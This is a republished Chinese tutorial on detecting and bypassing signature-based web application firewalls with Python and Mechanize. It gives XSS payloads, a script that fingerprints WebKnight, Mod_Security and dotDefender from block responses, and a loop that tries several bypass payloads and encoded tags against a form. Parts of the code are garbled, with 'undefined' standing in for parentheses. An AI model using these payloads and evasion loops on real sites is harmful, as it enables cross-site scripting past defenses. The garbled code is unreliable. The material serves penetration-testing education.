使用Python检测并绕过Web应用程序防火墙

本文涉及的产品
Web应用防火墙 3.0,每月20元额度 3个月
云防火墙,500元 1000GB
简介: 本文讲的是使用Python检测并绕过Web应用程序防火墙,Web应用防火墙通常放置在Web服务器的前面,以过滤来自服务器的恶意流量。如果你去一家公司做渗透测试,他们忘记告诉你,他们使用的Web应用防火墙,可能会影响渗透测试进度。
本文讲的是 使用Python检测并绕过Web应用程序防火墙Web应用防火墙通常放置在Web服务器的前面,以过滤来自服务器的恶意流量。如果你去一家公司做渗透测试,他们忘记告诉你,他们使用的Web应用防火墙,可能会影响渗透测试进度。下图描绘了一个简单的Web应用程序防火墙的工作原理:

正如你可以看到它像Web流量和Web服务器之间的墙壁,通常现在Web应用防火墙是基于签名的。

什么是基于签名的防火墙?

在基于签名的防火墙中,您可以定义签名,因为您知道网络攻击也遵循类似的模式或签名。因此,我们可以定义匹配模式并阻止它们,即

Payload :- <svg><script>alert`1`<p>

上面定义的Payload是一种跨站点脚本攻击,我们知道所有这些攻击都可以包含以下字符“<script>”,所以为什么我们不定义一个可以阻止Web流量的签名,如果它包含这个字符串,我们可以定义2-3个签名如下:

    1. <script>

    2. alert(*)

第一个签名将阻止包含<script>子串的任何请求,第二个将阻止警报(任何文本)。那么这就是基于签名的防火墙的工作原理。

怎么知道有防火墙?

使用Python检测并绕过Web应用程序防火墙

如果您正在进行渗透测试,并且您不知道有防火墙阻塞流量,因为它可能浪费了大量的时间,因为大多数时候,您的攻击有效负载被防火墙阻止,所以,在开始渗透测试之前,首先测试Web应用程序防火墙存在是一个好主意。

大多数防火墙现在就留下一些关于它们的轨迹,现在如果您使用上面定义的有效载荷攻击网络应用程序,并获得以下响应:

HTTP/1.1 406 Not Acceptable
Date: Mon, 10 Jan 2016
Server: nginx
Content-Type: text/html; charset=iso-8859-1
Not Acceptable!Not Acceptable! An appropriate representation of the

您可以清楚地看到,您的攻击被Mod_Security防火墙阻止。在本文中,我们将看到我们如何开发一个简单的python脚本,可以执行此任务检测防火墙并绕过它。

步骤1:定义HTML文档和PHP脚本!

我们必须定义我们的HTML文档来注入有效载荷和相应的PHP脚本来处理数据。我们在下面定义了这两个。

我们将使用以下HTML文档:

<html>
<body>
<form name="waf" action="waf.php" method="post">
Data: <input type="text" name="data"><br>
<input type="submit" value="Submit">
</form>
</body>
</html>

PHP脚本:

<html>
<body>
Data from the form : <?php echo $_POST["data"]; ?><br>
</body>
</html>

步骤2:准备恶意请求!

检测防火墙存在的第二步是创建一个可以被防火墙阻止的恶意跨站脚本请求。我们将使用一个名为“Mechanize”的python模块,了解更多关于此模块的信息,请阅读以下文章:

Automate Cross Site Scripting (XSS) attack using Beautiful Soup and Mechanize

如果您已经了解了Mechanize,可以跳过阅读文章。现在您了解了Mechanize,我们可以选择任何页面上提供的Web表单并提交请求。以下代码片段可用于做到这一点:

import mechanize as mec
maliciousRequest = mec.Browser()
formName = 'waf'
maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
maliciousRequest.select_form(formName)

让我们明白这个代码行:

  1. 在第一行,我们导入了mechanize模块,并给它一个简称'mec'供以后参考。

  2. 要使用mechanize下载网页,需要实例化浏览器。我们已经在代码的第二行中做到了。

  3. 在第一步,我们定义了我们的HTML文档,其中表单名称为“waf”,我们需要告诉mechanize选择此表单提交,因此我们在名为formName的变量中使用此名称。

  4. 比我们打开这个URL,就像我们在浏览器中一样。页面打开后,我们填写表单并提交数据,因此页面的打开与此相同。

  5. 最后我们选择了使用'select_form'函数传递它'formName'变量的形式。

正如你可以在HTML源代码中看到的那样,这个表单只有一个输入字段,我们将在该字段中注入我们的payload,一旦我们收到响应,我们将检查它的字符串以检测是否存在Web应用防火墙。

步骤3:准备有效载荷

在我们的HTML文档中,我们使用以下代码指定了一个输入字段:

 <input type =“text”name =“data”> <br>

您可以看到该字段的名称是“data”,我们可以使用以下代码定义此字段的输入:

crossSiteScriptingPayLoad = "<svg><script>alert`1`<p>"
maliciousRequest.form['data'] = crossSiteScriptingPayLoad

  1. 第一行将我们的有效载荷保存在变量中。

  2. 在第二行代码中,我们已将我们的有效内容分配给表单字段“数据”。

我们现在可以安全地提交此表格并检查答复。

步骤4:提交表单并记录回复

代码我将在此行提及后提交表单并记录回复:

maliciousRequest.submit()
response=maliciousRequest.response().read()
print response

  1. 提交表单

  2. 将响应保存在变量中。

  3. 打印回应。

由于我目前没有安装防火墙,所以我得到的响应是:

使用Python检测并绕过Web应用程序防火墙

可以看到有效载荷被打印回我们,意味着应用程序代码中不存在过滤,并且由于没有防火墙,我们的请求也没有被阻止。

步骤5:检测防火墙的存在

名为“response”的变量包含从服务器获得的响应,我们可以使用响应来检测防火墙的存在。我们将尝试在本教程中检测到以下防火墙的存在。

  1. WebKnight

  2. mod_security

  3. Dot Defender

看看我们如何用python代码实现这一点:

if response.find('WebKnight') >= 0:
      print "Firewall detected: WebKnight"
elif response.find('Mod_Security') >= 0:
     print "Firewall detected: Mod Security"
elif response.find('Mod_Security') >= 0:
     print "Firewall detected: Mod Security"
elif response.find('dotDefender') >= 0:
     print "Firewall detected: Dot Defender"
else:
     print "No Firewall Present"

如果安装Web Knight防火墙并且我们的请求被阻止,响应字符串将在其中包含“WebKnight”,那么find函数将返回大于0的值,这意味着WebKnight防火墙存在。同样,我们也可以检查其他2个防火墙。

我们可以扩展这个小应用程序来检测多少个防火墙,但您必须知道响应行为。

使用强力来绕过防火墙过滤器

我在文章的开头提到,大多数防火墙都基于签名阻止请求。但是,您可以使用数千种方式构建payload。javascript比较复杂,我们可以列出有效负载,并尝试其中的每一个,记录每个响应并检查是否能够绕过防火墙。请注意,如果防火墙规则被明确定义,则此方法可能无法正常工作。让我们看看我们如何使用python来强爆:

listofPayloads = ['<dialog open="" onclose="alertundefined1)"><form method="dialog"><button>Close me!</button></form></dialog>', '<svg><script>prompt&#40 1&#41<i>', '<a href="&#1;javascript:alertundefined1)">CLICK ME<a>']
for payLoads in listofPayloads:
   maliciousRequest = mec.Browserundefined)
   formName = 'waf'
   maliciousRequest.openundefined"http://check.cyberpersons.com/crossSiteCheck.html")
   maliciousRequest.select_formundefinedformName)
   maliciousRequest.form['data'] = payLoads
   maliciousRequest.submitundefined)
   response = maliciousRequest.responseundefined).readundefined)
   if response.findundefined'WebKnight') >= 0:
       print "Firewall detected: WebKnight"
   elif response.findundefined'Mod_Security') >= 0:
       print "Firewall detected: Mod Security"
   elif response.findundefined'Mod_Security') >= 0:
       print "Firewall detected: Mod Security"
   elif response.findundefined'dotDefender') >= 0:
       print "Firewall detected: Dot Defender"
   else:
       print "No Firewall Present"

  1. 在第一行,我们定义了3个有效载荷的列表,您可以扩展此列表,并根据需要添加多个有效负载。

  2. 然后在for循环中,我们做了与上面所做的相同的过程,但是这一次对于列表中的每个有效载荷。

  3. 收到响应后,我们再次比较看看防火墙是否存在。

因为我没有安装防火墙,我的输出是:

使用Python检测并绕过Web应用程序防火墙

将HTML标签转换为Unicode或Hex实体

如果防火墙正在过滤html标签,如<>。我们可以发送相应的Unicode或Hex实体,看看它们是否被转换为原始形式,如果是这样,那么这也可能是一个入口点。以下代码可用于检查此过程:

  listofPayloads = ['<b>','u003cbu003e','x3cbx3e']
  for payLoads in listofPayloads:
    maliciousRequest = mec.Browser()
    formName = 'waf'
    maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
    maliciousRequest.select_form(formName)
    maliciousRequest.form['data'] = payLoads
    maliciousRequest.submit()
    response = maliciousRequest.response().read()
    print "---------------------------------------------------"
    print response
    print "---------------------------------------------------"

每次我们将发送编码的数据,在响应中,我们将检查是否转换或打印回而不进行转换,当我运行这个代码,我得到了这个输出:

使用Python检测并绕过Web应用程序防火墙

表示没有编码的数据被转换为其原始格式。

结论

本文的目的是让您了解web应用防火墙,测试您网络的安全性,很多时候我们首先关心的应用程序的稳定性,但是我们忽略了安全部分,导致后期出现了严重的安全问题。




原文发布时间为:2017年6月23日
本文作者:愣娃
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
目录
相关文章
|
2月前
|
安全 测试技术 数据库
维护的Web应用程序
【10月更文挑战第4天】维护的Web应用程序
56 4
|
23天前
|
监控 前端开发 JavaScript
使用 MERN 堆栈构建可扩展 Web 应用程序的最佳实践
使用 MERN 堆栈构建可扩展 Web 应用程序的最佳实践
30 6
|
29天前
|
开发框架 搜索推荐 数据可视化
Django框架适合开发哪种类型的Web应用程序?
Django 框架凭借其强大的功能、稳定性和可扩展性,几乎可以适应各种类型的 Web 应用程序开发需求。无论是简单的网站还是复杂的企业级系统,Django 都能提供可靠的支持,帮助开发者快速构建高质量的应用。同时,其活跃的社区和丰富的资源也为开发者在项目实施过程中提供了有力的保障。
|
29天前
|
SQL 安全 网络安全
Web应用防火墙(WAF)与数据库应用防火墙有什么区别?
Web应用防火墙(WAF)专注于Web应用系统和网站的应用层防护,可有效应对OWASP Top 10等常见攻击,防止SQL注入、CC攻击等。而数据库应用防火墙则位于应用服务器与数据库之间,提供数据库访问控制、攻击阻断、虚拟补丁等高级防护功能,直接保护数据库免受攻击。两者分别针对Web层和数据库层提供不同的安全保护。
41 4
|
1月前
|
数据可视化 数据库 开发者
使用Dash构建交互式Web应用程序
【10月更文挑战第16天】本文介绍了使用Python的Dash框架构建交互式Web应用程序的方法。Dash结合了Flask、React和Plotly等技术,让开发者能够快速创建功能丰富的数据可视化应用。文章从安装Dash开始,逐步介绍了创建简单应用程序、添加交互元素、部署应用程序以及集成更多功能的步骤,并提供了代码示例。通过本文,读者可以掌握使用Dash构建交互式Web应用程序的基本技巧和高级功能。
|
2月前
|
SQL 关系型数据库 数据库
优化Web开发流程:Python ORM的优势与实现细节
【10月更文挑战第4天】在Web开发中,数据库操作至关重要,但直接编写SQL语句既繁琐又易错。对象关系映射(ORM)技术应运而生,让开发者以面向对象的方式操作数据库,显著提升了开发效率和代码可维护性。本文探讨Python ORM的优势及其实现细节,并通过Django ORM的示例展示其应用。ORM提供高级抽象层,简化数据库操作,提高代码可读性,并支持多种数据库后端,防止SQL注入。Django内置强大的ORM系统,通过定义模型、生成数据库表、插入和查询数据等步骤,展示了如何利用ORM简化复杂的数据库操作。
67 6
|
2月前
|
JavaScript 前端开发
如何使用Vue.js构建响应式Web应用程序
【10月更文挑战第9天】如何使用Vue.js构建响应式Web应用程序
|
2月前
|
前端开发 JavaScript 测试技术
构建响应式Web应用程序:React实战指南
【10月更文挑战第9天】构建响应式Web应用程序:React实战指南
|
2月前
|
存储 JavaScript 前端开发
如何使用React和Redux构建现代化Web应用程序
【10月更文挑战第4天】如何使用React和Redux构建现代化Web应用程序
|
2月前
|
设计模式 测试技术 持续交付
开发复杂Web应用程序
【10月更文挑战第3天】开发复杂Web应用程序
46 2